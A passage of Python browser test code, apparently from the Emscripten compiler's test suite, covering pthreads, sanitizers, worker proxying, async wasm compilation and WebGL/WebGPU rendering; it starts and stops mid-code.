'-sPTHREAD_POOL_SIZE=8', '--closure=1', '-sENVIRONMENT=web,worker']) # It is common for code to flip volatile global vars for thread control. This is a bit lax, but nevertheless, test whether that # kind of scheme will work with Emscripten as well. @requires_threads def test_pthread_volatile(self): for arg in [[], ['-DUSE_C_VOLATILE']]: self.btest_exit(test_file('pthread/test_pthread_volatile.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'] + arg) # Test thread-specific data (TLS). @requires_threads def test_pthread_thread_local_storage(self): self.btest_exit(test_file('pthread/test_pthread_thread_local_storage.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8', '-sASSERTIONS']) # Test the pthread condition variable creation and waiting. @requires_threads def test_pthread_condition_variable(self): self.btest_exit(test_file('pthread/test_pthread_condition_variable.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8']) # Test that pthreads are able to do printf. @requires_threads def test_pthread_printf(self): def run(debug): self.btest_exit(test_file('pthread/test_pthread_printf.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE', '-sLIBRARY_DEBUG=%d' % debug]) run(debug=True) run(debug=False) # Test that pthreads are able to do cout. Failed due to https://bugzilla.mozilla.org/show_bug.cgi?id=1154858. @requires_threads def test_pthread_iostream(self): self.btest_exit(test_file('pthread/test_pthread_iostream.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE']) @requires_threads def test_pthread_unistd_io_bigint(self): self.btest_exit(test_file('unistd/io.c'), args=['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sWASM_BIGINT']) # Test that the main thread is able to use pthread_set/getspecific. @also_with_wasm2js @requires_threads def test_pthread_setspecific_mainthread(self): self.btest_exit(test_file('pthread/test_pthread_setspecific_mainthread.c'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS']) # Test that pthreads have access to filesystem. @requires_threads def test_pthread_file_io(self): self.btest_exit(test_file('pthread/test_pthread_file_io.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE']) # Test that the pthread_create() function operates benignly in the case that threading is not supported. @requires_threads def test_pthread_supported(self): for args in [[], ['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8']]: self.btest_exit(test_file('pthread/test_pthread_supported.cpp'), args=['-O3'] + args) @requires_threads def test_pthread_dispatch_after_exit(self): self.btest_exit(test_file('pthread/test_pthread_dispatch_after_exit.c'), args=['-sUSE_PTHREADS']) # Test the operation of Module.pthreadMainPrefixURL variable @requires_threads def test_pthread_custom_pthread_main_url(self): self.set_setting('EXIT_RUNTIME') ensure_dir('cdn') create_file('main.cpp', r''' #include <assert.h> #include <stdio.h> #include <string.h> #include <emscripten/emscripten.h> #include <emscripten/threading.h> #include <pthread.h> _Atomic int result = 0; void *thread_main(void *arg) { result = 1; pthread_exit(0); } int main() { pthread_t t; pthread_create(&t, 0, thread_main, 0); pthread_join(t, 0); assert(result == 1); return 0; } ''') # Test that it is possible to define "Module.locateFile" string to locate where worker.js will be loaded from. create_file('shell.html', read_file(path_from_root('src/shell.html')).replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, ')) self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-sWASM=0', '-sIN_TEST_HARNESS', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE', '-o', 'test.html'], reporting=Reporting.JS_ONLY) shutil.move('test.worker.js', Path('cdn/test.worker.js')) if os.path.exists('test.html.mem'): shutil.copyfile('test.html.mem', Path('cdn/test.html.mem')) self.run_browser('test.html', '', '/report_result?exit:0') # Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from. create_file('shell2.html', read_file(path_from_root('src/shell.html')).replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.worker.js") return "cdn/test.worker.js"; else return filename; }, ')) self.compile_btest(['main.cpp', '--shell-file', 'shell2.html', '-sWASM=0', '-sIN_TEST_HARNESS', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE', '-o', 'test2.html'], reporting=Reporting.JS_ONLY) try_delete('test.worker.js') self.run_browser('test2.html', '', '/report_result?exit:0') # Test that if the main thread is performing a futex wait while a pthread needs it to do a proxied operation (before that pthread would wake up the main thread), that it's not a deadlock. @requires_threads def test_pthread_proxying_in_futex_wait(self): self.btest_exit(test_file('pthread/test_pthread_proxying_in_futex_wait.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE']) # Test that sbrk() operates properly in multithreaded conditions @requires_threads def test_pthread_sbrk(self): for aborting_malloc in [0, 1]: print('aborting malloc=' + str(aborting_malloc)) # With aborting malloc = 1, test allocating memory in threads # With aborting malloc = 0, allocate so much memory in threads that some of the allocations fail. self.btest_exit(test_file('pthread/test_pthread_sbrk.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8', '-sABORTING_MALLOC=' + str(aborting_malloc), '-DABORTING_MALLOC=' + str(aborting_malloc), '-sINITIAL_MEMORY=128MB']) # Test that -sABORTING_MALLOC=0 works in both pthreads and non-pthreads builds. (sbrk fails gracefully) @requires_threads def test_pthread_gauge_available_memory(self): for opts in [[], ['-O2']]: for args in [[], ['-sUSE_PTHREADS']]: self.btest(test_file('gauge_available_memory.cpp'), expected='1', args=['-sABORTING_MALLOC=0'] + args + opts) # Test that the proxying operations of user code from pthreads to main thread work @requires_threads def test_pthread_run_on_main_thread(self): self.btest_exit(test_file('pthread/test_pthread_run_on_main_thread.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE']) # Test how a lot of back-to-back called proxying operations behave. @requires_threads def test_pthread_run_on_main_thread_flood(self): self.btest_exit(test_file('pthread/test_pthread_run_on_main_thread_flood.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE']) # Test that it is possible to asynchronously call a JavaScript function on the main thread. @requires_threads def test_pthread_call_async(self): self.btest_exit(test_file('pthread/call_async.c'), args=['-sUSE_PTHREADS']) # Test that it is possible to synchronously call a JavaScript function on the main thread and get a return value back. @requires_threads def test_pthread_call_sync_on_main_thread(self): self.btest_exit(test_file('pthread/call_sync_on_main_thread.c'), args=['-O3', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-DPROXY_TO_PTHREAD=1', '--js-library', test_file('pthread/call_sync_on_main_thread.js')]) self.btest_exit(test_file('pthread/call_sync_on_main_thread.c'), args=['-O3', '-sUSE_PTHREADS', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread/call_sync_on_main_thread.js')]) self.btest_exit(test_file('pthread/call_sync_on_main_thread.c'), args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread/call_sync_on_main_thread.js'), '-sEXPORTED_FUNCTIONS=_main,_malloc']) # Test that it is possible to asynchronously call a JavaScript function on the main thread. @requires_threads def test_pthread_call_async_on_main_thread(self): self.btest(test_file('pthread/call_async_on_main_thread.c'), expected='7', args=['-O3', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-DPROXY_TO_PTHREAD=1', '--js-library', test_file('pthread/call_async_on_main_thread.js')]) self.btest(test_file('pthread/call_async_on_main_thread.c'), expected='7', args=['-O3', '-sUSE_PTHREADS', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread/call_async_on_main_thread.js')]) self.btest(test_file('pthread/call_async_on_main_thread.c'), expected='7', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread/call_async_on_main_thread.js')]) # Tests that spawning a new thread does not cause a reinitialization of the global data section of the application memory area. @requires_threads def test_pthread_global_data_initialization(self): mem_init_modes = [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']] for mem_init_mode in mem_init_modes: for args in [['-sMODULARIZE', '-sEXPORT_NAME=MyModule', '--shell-file', test_file('shell_that_launches_modularize.html')], ['-O3']]: self.btest_exit(test_file('pthread/test_pthread_global_data_initialization.c'), args=args + mem_init_mode + ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sPTHREAD_POOL_SIZE']) @requires_threads @requires_sync_compilation def test_pthread_global_data_initialization_in_sync_compilation_mode(self): mem_init_modes = [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']] for mem_init_mode in mem_init_modes: args = ['-sWASM_ASYNC_COMPILATION=0'] self.btest_exit(test_file('pthread/test_pthread_global_data_initialization.c'), args=args + mem_init_mode + ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sPTHREAD_POOL_SIZE']) # Test that emscripten_get_now() reports coherent wallclock times across all pthreads, instead of each pthread independently reporting wallclock times since the launch of that pthread. @requires_threads def test_pthread_clock_drift(self): self.btest_exit(test_file('pthread/test_pthread_clock_drift.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD']) @requires_threads def test_pthread_utf8_funcs(self): self.btest_exit(test_file('pthread/test_pthread_utf8_funcs.cpp'), args=['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE']) # Test the emscripten_futex_wake(addr, INT_MAX); functionality to wake all waiters @also_with_wasm2js @requires_threads def test_pthread_wake_all(self): self.btest_exit(test_file('pthread/test_futex_wake_all.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sINITIAL_MEMORY=64MB']) # Test that stack base and max correctly bound the stack on pthreads. @requires_threads def test_pthread_stack_bounds(self): self.btest_exit(test_file('pthread/test_pthread_stack_bounds.cpp'), args=['-sUSE_PTHREADS']) # Test that real `thread_local` works. @requires_threads def test_pthread_tls(self): self.btest_exit(test_file('pthread/test_pthread_tls.cpp'), args=['-sPROXY_TO_PTHREAD', '-sUSE_PTHREADS']) # Test that real `thread_local` works in main thread without PROXY_TO_PTHREAD. @requires_threads def test_pthread_tls_main(self): self.btest_exit(test_file('pthread/test_pthread_tls_main.cpp'), args=['-sUSE_PTHREADS']) @requires_threads def test_pthread_safe_stack(self): # Note that as the test runs with PROXY_TO_PTHREAD, we set TOTAL_STACK, # and not DEFAULT_PTHREAD_STACK_SIZE, as the pthread for main() gets the # same stack size as the main thread normally would. self.btest(test_file('core/test_safe_stack.c'), expected='abort:stack overflow', args=['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sSTACK_OVERFLOW_CHECK=2', '-sTOTAL_STACK=64KB']) @parameterized({ 'leak': ['test_pthread_lsan_leak', ['-gsource-map']], 'no_leak': ['test_pthread_lsan_no_leak'], }) @requires_threads @no_firefox('https://github.com/emscripten-core/emscripten/issues/15978') def test_pthread_lsan(self, name, args=[]): self.btest(test_file('pthread', name + '.cpp'), expected='1', args=['-fsanitize=leak', '-sINITIAL_MEMORY=256MB', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '--pre-js', test_file('pthread', name + '.js')] + args) @parameterized({ # Reusing the LSan test files for ASan. 'leak': ['test_pthread_lsan_leak', ['-gsource-map']], 'no_leak': ['test_pthread_lsan_no_leak'], }) @requires_threads def test_pthread_asan(self, name, args=[]): self.btest(test_file('pthread', name + '.cpp'), expected='1', args=['-fsanitize=address', '-sINITIAL_MEMORY=256MB', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '--pre-js', test_file('pthread', name + '.js')] + args) @requires_threads def test_pthread_asan_use_after_free(self): self.btest(test_file('pthread/test_pthread_asan_use_after_free.cpp'), expected='1', args=['-fsanitize=address', '-sINITIAL_MEMORY=256MB', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '--pre-js', test_file('pthread/test_pthread_asan_use_after_free.js')]) @requires_threads def test_pthread_asan_use_after_free_2(self): # similiar to test_pthread_asan_use_after_free, but using a pool instead # of proxy-to-pthread, and also the allocation happens on the pthread # (which tests that it can use the offset converter to get the stack # trace there) self.btest(test_file('pthread/test_pthread_asan_use_after_free_2.cpp'), expected='1', args=['-fsanitize=address', '-sINITIAL_MEMORY=256MB', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=1', '--pre-js', test_file('pthread/test_pthread_asan_use_after_free_2.js')]) @requires_threads def test_pthread_exit_process(self): args = ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sPTHREAD_POOL_SIZE=2', '-sEXIT_RUNTIME', '-DEXIT_RUNTIME', '-O0'] args += ['--pre-js', test_file('core/pthread/test_pthread_exit_runtime.pre.js')] self.btest(test_file('core/pthread/test_pthread_exit_runtime.c'), expected='onExit status: 42', args=args) @requires_threads def test_pthread_trap(self): create_file('pre.js', ''' if (typeof window === 'object' && window) { window.addEventListener('error', function(e) { if (e.error && e.error.message.includes('unreachable')) maybeReportResultToServer("expected exception caught"); else maybeReportResultToServer("unexpected: " + e); }); }''') args = ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sEXIT_RUNTIME', '--profiling-funcs', '--pre-js=pre.js'] self.btest(test_file('pthread/test_pthread_trap.c'), expected='expected exception caught', args=args) # Tests MAIN_THREAD_EM_ASM_INT() function call signatures. def test_main_thread_em_asm_signatures(self): self.btest_exit(test_file('core/test_em_asm_signatures.cpp'), assert_returncode=121, args=[]) @requires_threads def test_main_thread_em_asm_signatures_pthreads(self): self.btest_exit(test_file('core/test_em_asm_signatures.cpp'), assert_returncode=121, args=['-O3', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sASSERTIONS']) @requires_threads def test_main_thread_async_em_asm(self): self.btest_exit(test_file('core/test_main_thread_async_em_asm.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sASSERTIONS']) @requires_threads def test_main_thread_em_asm_blocking(self): create_file('page.html', read_file(test_file('browser/test_em_asm_blocking.html'))) self.compile_btest([test_file('browser/test_em_asm_blocking.cpp'), '-O2', '-o', 'wasm.js', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD']) self.run_browser('page.html', '', '/report_result?8') # Test that it is possible to send a signal via calling alarm(timeout), which in turn calls to the signal handler set by signal(SIGALRM, func); def test_sigalrm(self): self.btest_exit(test_file('test_sigalrm.c'), args=['-O3']) def test_canvas_style_proxy(self): self.btest('canvas_style_proxy.c', expected='1', args=['--proxy-to-worker', '--shell-file', test_file('canvas_style_proxy_shell.html'), '--pre-js', test_file('canvas_style_proxy_pre.js')]) def test_canvas_size_proxy(self): self.btest(test_file('canvas_size_proxy.c'), expected='0', args=['--proxy-to-worker']) def test_custom_messages_proxy(self): self.btest(test_file('custom_messages_proxy.c'), expected='1', args=['--proxy-to-worker', '--shell-file', test_file('custom_messages_proxy_shell.html'), '--post-js', test_file('custom_messages_proxy_postjs.js')]) def test_vanilla_html_when_proxying(self): for opts in [0, 1, 2]: print(opts) self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js', '-O' + str(opts), '--proxy-to-worker']) create_file('test.html', '<script src="test.js"></script>') self.run_browser('test.html', None, '/report_result?0') def test_in_flight_memfile_request(self): # test the XHR for an asm.js mem init file being in flight already for o in [0, 1, 2]: print(o) opts = ['-O' + str(o), '-sWASM=0'] print('plain html') self.compile_btest([test_file('in_flight_memfile_request.c'), '-o', 'test.js'] + opts) create_file('test.html', '<script src="test.js"></script>') self.run_browser('test.html', None, '/report_result?0') # never when we provide our own HTML like this. print('default html') self.btest('in_flight_memfile_request.c', expected='0' if o < 2 else '1', args=opts) # should happen when there is a mem init file (-O2+) @requires_sync_compilation def test_binaryen_async(self): # notice when we use async compilation script = ''' <script> // note if we do async compilation var real_wasm_instantiate = WebAssembly.instantiate; var real_wasm_instantiateStreaming = WebAssembly.instantiateStreaming; if (typeof real_wasm_instantiateStreaming === 'function') { WebAssembly.instantiateStreaming = function(a, b) { Module.sawAsyncCompilation = true; return real_wasm_instantiateStreaming(a, b); }; } else { WebAssembly.instantiate = function(a, b) { Module.sawAsyncCompilation = true; return real_wasm_instantiate(a, b); }; } // show stderr for the viewer's fun err = function(x) { out('<<< ' + x + ' >>>'); console.log(x); }; </script> {{{ SCRIPT }}} ''' shell_with_script('shell.html', 'shell.html', script) common_args = ['--shell-file', 'shell.html'] for opts, returncode in [ ([], 1), (['-O1'], 1), (['-O2'], 1), (['-O3'], 1), (['-sWASM_ASYNC_COMPILATION'], 1), # force it on (['-O1', '-sWASM_ASYNC_COMPILATION=0'], 0), # force it off ]: print(opts, returncode) self.btest_exit('binaryen_async.c', assert_returncode=returncode, args=common_args + opts) # Ensure that compilation still works and is async without instantiateStreaming available no_streaming = ' <script> WebAssembly.instantiateStreaming = undefined;</script>' shell_with_script('shell.html', 'shell.html', no_streaming + script) self.btest_exit('binaryen_async.c', assert_returncode=1, args=common_args) # Test that implementing Module.instantiateWasm() callback works. @parameterized({ '': ([],), 'asan': (['-fsanitize=address', '-sINITIAL_MEMORY=128MB'],) }) def test_manual_wasm_instantiate(self, args=[]): self.compile_btest([test_file('manual_wasm_instantiate.cpp'), '-o', 'manual_wasm_instantiate.js'] + args) shutil.copyfile(test_file('manual_wasm_instantiate.html'), 'manual_wasm_instantiate.html') self.run_browser('manual_wasm_instantiate.html', 'wasm instantiation succeeded', '/report_result?1') def test_wasm_locate_file(self): # Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from. ensure_dir('cdn') create_file('shell2.html', read_file(path_from_root('src/shell.html')).replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.wasm") return "cdn/test.wasm"; else return filename; }, ')) self.compile_btest([test_file('browser_test_hello_world.c'), '--shell-file', 'shell2.html', '-o', 'test.html']) shutil.move('test.wasm', Path('cdn/test.wasm')) self.run_browser('test.html', '', '/report_result?0') @also_with_threads def test_utf8_textdecoder(self): self.btest_exit('benchmark_utf8.cpp', 0, args=['--embed-file', test_file('utf8_corpus.txt') + '@/utf8_corpus.txt', '-sEXPORTED_RUNTIME_METHODS=[UTF8ToString]']) @also_with_threads def test_utf16_textdecoder(self): self.btest_exit('benchmark_utf16.cpp', 0, args=['--embed-file', test_file('utf16_corpus.txt') + '@/utf16_corpus.txt', '-sEXPORTED_RUNTIME_METHODS=[UTF16ToString,stringToUTF16,lengthBytesUTF16]']) @also_with_threads def test_TextDecoder(self): self.btest('browser_test_hello_world.c', '0', args=['-sTEXTDECODER=0']) just_fallback = os.path.getsize('test.js') self.btest('browser_test_hello_world.c', '0') td_with_fallback = os.path.getsize('test.js') self.btest('browser_test_hello_world.c', '0', args=['-sTEXTDECODER=2']) td_without_fallback = os.path.getsize('test.js') # pthread TextDecoder support is more complex due to # https://github.com/whatwg/encoding/issues/172 # and therefore the expected code size win there is actually a loss if '-pthread' not in self.emcc_args: self.assertLess(td_without_fallback, just_fallback) else: self.assertGreater(td_without_fallback, just_fallback) self.assertLess(just_fallback, td_with_fallback) def test_small_js_flags(self): self.btest('browser_test_hello_world.c', '0', args=['-O3', '--closure=1', '-sINCOMING_MODULE_JS_API=[]', '-sENVIRONMENT=web']) # Check an absolute js code size, with some slack. size = os.path.getsize('test.js') print('size:', size) # Note that this size includes test harness additions (for reporting the result, etc.). self.assertLess(abs(size - 5500), 100) # Tests that it is possible to initialize and render WebGL content in a pthread by using OffscreenCanvas. # -DTEST_CHAINED_WEBGL_CONTEXT_PASSING: Tests that it is possible to transfer WebGL canvas in a chain from main thread -> thread 1 -> thread 2 and then init and render WebGL content there. @no_chrome('see https://crbug.com/961765') @requires_threads @requires_offscreen_canvas @requires_graphics_hardware def test_webgl_offscreen_canvas_in_pthread(self): for args in [[], ['-DTEST_CHAINED_WEBGL_CONTEXT_PASSING']]: self.btest('gl_in_pthread.cpp', expected='1', args=args + ['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2', '-sOFFSCREENCANVAS_SUPPORT', '-lGL']) # Tests that it is possible to render WebGL content on a <canvas> on the main thread, after it has once been used to render WebGL content in a pthread first # -DTEST_MAIN_THREAD_EXPLICIT_COMMIT: Test the same (WebGL on main thread after pthread), but by using explicit .commit() to swap on the main thread instead of implicit "swap when rAF ends" logic @requires_threads @requires_offscreen_canvas @requires_graphics_hardware @disabled('This test is disabled because current OffscreenCanvas does not allow transfering it after a rendering context has been created for it.') def test_webgl_offscreen_canvas_in_mainthread_after_pthread(self): for args in [[], ['-DTEST_MAIN_THREAD_EXPLICIT_COMMIT']]: self.btest('gl_in_mainthread_after_pthread.cpp', expected='0', args=args + ['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2', '-sOFFSCREENCANVAS_SUPPORT', '-lGL']) @requires_threads @requires_offscreen_canvas @requires_graphics_hardware def test_webgl_offscreen_canvas_only_in_pthread(self): self.btest_exit('gl_only_in_pthread.cpp', args=['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE', '-sOFFSCREENCANVAS_SUPPORT', '-lGL', '-sOFFSCREEN_FRAMEBUFFER']) # Tests that rendering from client side memory without default-enabling extensions works. @requires_graphics_hardware def test_webgl_from_client_side_memory_without_default_enabled_extensions(self): self.btest_exit('webgl_draw_triangle.c', args=['-lGL', '-sOFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1', '-DDRAW_FROM_CLIENT_MEMORY=1', '-sFULL_ES2=1']) # Tests for WEBGL_multi_draw extension # For testing WebGL draft extensions like this, if using chrome as the browser, # We might want to append the --enable-webgl-draft-extensions to the EMTEST_BROWSER env arg. @requires_graphics_hardware def test_webgl_multi_draw(self): self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png', args=['-lGL', '-sOFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ARRAYS=1', '-DEXPLICIT_SWAP=1']) self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png', args=['-lGL', '-sOFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ARRAYS_INSTANCED=1', '-DEXPLICIT_SWAP=1']) self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png', args=['-lGL', '-sOFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ELEMENTS=1', '-DEXPLICIT_SWAP=1']) self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png', args=['-lGL', '-sOFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ELEMENTS_INSTANCED=1', '-DEXPLICIT_SWAP=1']) # Tests for base_vertex/base_instance extension # For testing WebGL draft extensions like this, if using chrome as the browser, # We might want to append the --enable-webgl-draft-extensions to the EMTEST_BROWSER env arg. # If testing on Mac, you also need --use-cmd-decoder=passthrough to get this extension. # Also there is a known bug with Mac Intel baseInstance which can fail producing the expected image result. @requires_graphics_hardware def test_webgl_draw_base_vertex_base_instance(self): for multiDraw in [0, 1]: for drawElements in [0, 1]: self.btest('webgl_draw_base_vertex_base_instance_test.c', reference='webgl_draw_instanced_base_vertex_base_instance.png', args=['-lGL', '-sMAX_WEBGL_VERSION=2', '-sOFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW=' + str(multiDraw), '-DDRAW_ELEMENTS=' + str(drawElements), '-DEXPLICIT_SWAP=1', '-DWEBGL_CONTEXT_VERSION=2']) @requires_graphics_hardware def test_webgl_sample_query(self): cmd = ['-sMAX_WEBGL_VERSION=2', '-lGL'] self.btest_exit('webgl_sample_query.cpp', args=cmd) @requires_graphics_hardware def test_webgl_timer_query(self): for args in [ # EXT query entrypoints on WebGL 1.0 ['-sMAX_WEBGL_VERSION'], # builtin query entrypoints on WebGL 2.0 ['-sMAX_WEBGL_VERSION=2', '-DTEST_WEBGL2'], # EXT query entrypoints on a WebGL 1.0 context while built for WebGL 2.0 ['-sMAX_WEBGL_VERSION=2'], ]: cmd = args + ['-lGL'] self.btest_exit('webgl_timer_query.cpp', args=cmd) # Tests that -sOFFSCREEN_FRAMEBUFFER rendering works. @requires_graphics_hardware def test_webgl_offscreen_framebuffer(self): # Tests all the different possible versions of libgl for threads in [[], ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD']]: for version in [[], ['-sFULL_ES3'], ['-sFULL_ES3']]: args = ['-lGL', '-sOFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1'] + threads + version print('with args: %s' % str(args)) self.btest_exit('webgl_draw_triangle.c', args=args) # Tests that VAOs can be used even if WebGL enableExtensionsByDefault is set to 0. @requires_graphics_hardware def test_webgl_vao_without_automatic_extensions(self): self.btest_exit('test_webgl_no_auto_init_extensions.c', args=['-lGL', '-sGL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=0']) # Tests that offscreen framebuffer state restoration works @requires_graphics_hardware def test_webgl_offscreen_framebuffer_state_restoration(self): for args in [ # full state restoration path on WebGL 1.0 ['-sMAX_WEBGL_VERSION', '-sOFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH'], # VAO path on WebGL 1.0 ['-sMAX_WEBGL_VERSION'], ['-sMAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=0'], # VAO path on WebGL 2.0 ['-sMAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-DTEST_REQUIRE_VAO=1'], # full state restoration path on WebGL 2.0 ['-sMAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-sOFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH'], # blitFramebuffer path on WebGL 2.0 (falls back to VAO on Firefox < 67) ['-sMAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=0'], ]: cmd = args + ['-lGL', '-sOFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1'] self.btest_exit('webgl_offscreen_framebuffer_swap_with_bad_state.c', args=cmd) # Tests that -sWORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG rendering works. @requires_graphics_hardware def test_webgl_workaround_webgl_uniform_upload_bug(self): self.btest_exit('webgl_draw_triangle_with_uniform_color.c', args=['-lGL', '-sWORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG']) # Tests that using an array of structs in GL uniforms works. @requires_graphics_hardware def test_webgl_array_of_structs_uniform(self): self.btest('webgl_array_of_structs_uniform.c', args=['-lGL', '-sMAX_WEBGL_VERSION=2'], reference='webgl_array_of_structs_uniform.png') # Tests that if a WebGL context is created in a pthread on a canvas that has not been transferred to that pthread, WebGL calls are then proxied to the main thread # -DTEST_OFFSCREEN_CANVAS=1: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via using Emscripten's EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES="#canvas", then OffscreenCanvas is used # -DTEST_OFFSCREEN_CANVAS=2: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via automatic transferring of Module.canvas when EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES is not defined, then OffscreenCanvas is also used @parameterized({ '': ([False],), 'asyncify': ([True],), }) @requires_threads @requires_offscreen_canvas @requires_graphics_hardware def test_webgl_offscreen_canvas_in_proxied_pthread(self, asyncify): cmd = ['-sUSE_PTHREADS', '-sOFFSCREENCANVAS_SUPPORT', '-lGL', '-sGL_DEBUG', '-sPROXY_TO_PTHREAD'] if asyncify: # given the synchronous render loop here, asyncify is needed to see intermediate frames and # the gradual color change cmd += ['-sASYNCIFY', '-DASYNCIFY'] print(str(cmd)) self.btest_exit('gl_in_proxy_pthread.cpp', args=cmd) @parameterized({ 'proxy': (['-sPROXY_TO_PTHREAD'],), '': ([],), }) @requires_threads @requires_graphics_hardware @requires_offscreen_canvas def test_webgl_resize_offscreencanvas_from_main_thread(self, args): for args2 in [[], ['-DTEST_SYNC_BLOCKING_LOOP=1']]: for args3 in [[], ['-sOFFSCREENCANVAS_SUPPORT', '-sOFFSCREEN_FRAMEBUFFER']]: cmd = args + args2 + args3 + ['-sUSE_PTHREADS', '-lGL', '-sGL_DEBUG'] print(str(cmd)) self.btest_exit('resize_offscreencanvas_from_main_thread.cpp', args=cmd) @requires_graphics_hardware def test_webgl_simple_enable_extensions(self): for webgl_version in [1, 2]: for simple_enable_extensions in [0, 1]: cmd = ['-DWEBGL_CONTEXT_VERSION=' + str(webgl_version), '-DWEBGL_SIMPLE_ENABLE_EXTENSION=' + str(simple_enable_extensions), '-sMAX_WEBGL_VERSION=2', '-sGL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=' + str(simple_enable_extensions), '-sGL_SUPPORT_SIMPLE_ENABLE_EXTENSIONS=' + str(simple_enable_extensions)] self.btest_exit('webgl2_simple_enable_extensions.c', args=cmd) @requires_graphics_hardware def test_webgpu_basic_rendering(self): for args in [[], ['-sASSERTIONS', '--closure=1'], ['-sMAIN_MODULE=1']]: self.btest_exit('webgpu_basic_rendering.cpp', args=['-sUSE_WEBGPU'] + args) def test_webgpu_get_device(self): for args in [['-sASSERTIONS', '--closure=1']]: self.btest_exit('webgpu_get_device.cpp', args=['-sUSE_WEBGPU'] + args) # Tests the feature that shell html page can preallocate the typed array and place it # to Module.buffer before loading the script page. # In this build mode, the -sINITIAL_MEMORY=xxx option will be ignored. # Preallocating the buffer in this was is asm.js only (wasm needs a Memory). def test_preallocated_heap(self): self.btest_exit('test_preallocated_heap.cpp', args=['-sWASM=0', '-sINITIAL_MEMORY=16MB', '-sABORTING_MALLOC=0', '--shell-file', test_file('test_preallocated_heap_shell.html')]) # Tests emscripten_fetch() usage to XHR data directly to memory without persisting results to IndexedDB. @also_with_wasm2js def test_fetch_to_memory(self): # Test error reporting in the negative case when the file URL doesn't exist. (http 404) 